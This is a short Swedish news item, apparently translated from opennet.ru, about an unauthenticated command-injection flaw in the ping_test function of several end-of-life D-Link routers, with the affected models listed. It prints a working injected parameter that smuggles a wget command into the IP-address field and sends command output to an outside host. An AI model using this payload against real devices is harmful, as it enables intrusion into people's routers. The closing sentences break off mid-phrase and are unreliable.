I D-Link trådlösa routrar
Intressant nog, enligt firmwareutvecklarna, bör "ping_test"-anropet endast köras efter autentisering, men i verkligheten anropas det i alla fall, oavsett om du loggar in i webbgränssnittet. Speciellt när man öppnar skriptet application_sec.cgi och skickar parametern "action=ping_test", omdirigerar skriptet till autentiseringssidan, men utför samtidigt den åtgärd som är associerad med ping_test. För att exekvera koden användes en annan sårbarhet i själva ping_test, som anropar pingverktyget utan att korrekt kontrollera korrektheten av IP-adressen som skickats för testning. För att till exempel anropa verktyget wget och överföra resultatet av kommandot "echo 1234" till en extern värd, specificera bara parametern "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Förekomsten av sårbarheten har officiellt bekräftats i följande modeller:
- DIR-655 med firmware 3.02b05 eller äldre;
- DIR-866L med firmware 1.03b04 eller äldre;
- DIR-1565 med firmware 1.01 eller äldre;
- DIR-652 (ingen information om problematiska firmwareversioner tillhandahålls)
Supportperioden för dessa modeller har redan löpt ut, så D-Link
Det upptäcktes senare att sårbarheten också var det
Källa: opennet.ru